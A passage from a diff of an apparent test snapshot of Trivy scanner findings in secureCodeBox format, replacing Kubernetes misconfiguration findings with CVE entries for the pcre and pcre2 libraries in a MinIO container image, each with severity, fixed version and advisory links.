case-less matching within JIT.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "name": "pcre2: Out-of-bounds read in compile_xclass_matchingpath in pcre2_jit_compile.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", + "value": "https://avd.aquasec.com/nvd/cve-2022-1586", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + "value": "https://access.redhat.com/errata/RHSA-2022:5809", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "value": "https://access.redhat.com/security/cve/CVE-2022-1586", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "value": "https://bugzilla.redhat.com/2077976", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/56152", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", }, { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "https://errata.almalinux.org/8/ALSA-2022-5809.html", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "https://errata.rockylinux.org/RLSA-2022:5809", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "https://linux.oracle.com/cve/CVE-2022-1586.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "https://linux.oracle.com/errata/ELSA-2022-5809.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20221028-0009/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5627-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5627-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1586", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "10.36-2+deb11u1", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1587", + "installedVersion": "10.36-2", + "packageName": "libpcre2-8-0", "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", + "https://access.redhat.com/security/cve/CVE-2022-1587", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077983,", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1587", + "https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0", + "https://linux.oracle.com/cve/CVE-2022-1587.html", + "https://linux.oracle.com/errata/ELSA-2022-5251.html", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1587", + "https://security.netapp.com/advisory/ntap-20221028-0009/", + "https://ubuntu.com/security/notices/USN-5627-1", + "https://ubuntu.com/security/notices/USN-5627-2", + "https://www.cve.org/CVERecord?id=CVE-2022-1587", ], }, - "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "category": "Vulnerability", + "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the get_recurse_data_length() function of the pcre2_jit_compile.c file. This issue affects recursions in JIT-compiled regular expressions caused by duplicate data transfers.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.allowPrivilegeEscalation' to false)", + "mitigation": undefined, + "name": "pcre2: Out-of-bounds read in get_recurse_data_length in pcre2_jit_compile.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", + "value": "https://avd.aquasec.com/nvd/cve-2022-1587", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://access.redhat.com/security/cve/CVE-2022-1587", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", - ], - }, - "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'minio' of Deployment 'securecodebox-operator-minio' should add 'ALL' to 'securityContext.capabilities.drop')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077983,", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1587", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://linux.oracle.com/cve/CVE-2022-1587.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", - ], - }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.readOnlyRootFilesystem' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://linux.oracle.com/errata/ELSA-2022-5251.html", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV015", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv015", - ], - }, - "category": "Misconfiguration", - "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set 'containers[].resources.requests.cpu'.", - "name": "CPU requests not specified(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'resources.requests.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv015", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'resources.limits.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1587", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://security.netapp.com/advisory/ntap-20221028-0009/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://ubuntu.com/security/notices/USN-5627-1", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://ubuntu.com/security/notices/USN-5627-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1587", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-11164", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", + "http://openwall.com/lists/oss-security/2017/07/11/3", + "http://www.openwall.com/lists/oss-security/2023/04/11/1", + "http://www.openwall.com/lists/oss-security/2023/04/12/1", + "http://www.securityfocus.com/bid/99575", + "https://access.redhat.com/security/cve/CVE-2017-11164", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", + "https://www.cve.org/CVERecord?id=CVE-2017-11164", ], }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "category": "Vulnerability", + "description": "In PCRE 8.41, the OP_KETRMAX feature in the match function in pcre_exec.c allows stack exhaustion (uncontrolled recursion) when processing a crafted regular expression.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "mitigation": undefined, + "name": "pcre: OP_KETRMAX feature in the match function in pcre_exec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://avd.aquasec.com/nvd/cve-2017-11164", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "http://openwall.com/lists/oss-security/2017/07/11/3", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "http://www.openwall.com/lists/oss-security/2023/04/11/1", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "http://www.openwall.com/lists/oss-security/2023/04/12/1", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb10u7", - "foundIn": "Target: 'k8s.gcr.io/kube-scheduler:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3134-1", - "installedVersion": "2021a-0+deb10u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new timezone database", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb10u8", - "foundIn": "Target: 'k8s.gcr.io/kube-scheduler:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3161-1", - "installedVersion": "2021a-0+deb10u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new timezone database", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb10u10", - "foundIn": "Target: 'k8s.gcr.io/kube-scheduler:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3366-1", - "installedVersion": "2021a-0+deb10u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new timezone database", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb10u11", - "foundIn": "Target: 'k8s.gcr.io/kube-scheduler:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3412-1", - "installedVersion": "2021a-0+deb10u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new timezone database", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0040", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0040", - ], - }, - "category": "Misconfiguration", - "description": "Disable profiling, if not needed.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Edit the Scheduler pod specification file /etc/kubernetes/manifests/kube-scheduler.yaml file on the Control Plane node and set the below parameter.", - "name": "Ensure that the --profiling argument is set to false(Ensure that the --profiling argument is set to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0040", + "value": "http://www.securityfocus.com/bid/99575", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://access.redhat.com/security/cve/CVE-2017-11164", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", - ], - }, - "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", - ], - }, - "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-11164", }, ], "severity": "LOW", @@ -130896,173 +132291,77 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV009", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-16231", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv009", + "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", + "http://seclists.org/fulldisclosure/2018/Dec/33", + "http://www.openwall.com/lists/oss-security/2017/11/01/11", + "http://www.openwall.com/lists/oss-security/2017/11/01/3", + "http://www.openwall.com/lists/oss-security/2017/11/01/7", + "http://www.openwall.com/lists/oss-security/2017/11/01/8", + "http://www.securityfocus.com/bid/101688", + "https://access.redhat.com/security/cve/CVE-2017-16231", + "https://bugs.exim.org/show_bug.cgi?id=2047", + "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", + "https://www.cve.org/CVERecord?id=CVE-2017-16231", ], }, - "category": "Misconfiguration", - "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", - "name": "Access to host network(Pod 'kube-scheduler-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", + "category": "Vulnerability", + "description": "** DISPUTED ** In PCRE 8.41, after compiling, a pcretest load test PoC produces a crash overflow in the function match() in pcre_exec.c because of a self-recursive call. NOTE: third parties dispute the relevance of this report, noting that there are options that can be used to limit the amount of stack that is used.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "pcre: self-recursive call in match() in pcre_exec.c leads to denial of service", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv009", + "value": "https://avd.aquasec.com/nvd/cve-2017-16231", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "http://seclists.org/fulldisclosure/2018/Dec/33", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/11", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/3", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/7", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", - ], - }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/8", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "http://www.securityfocus.com/bid/101688", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 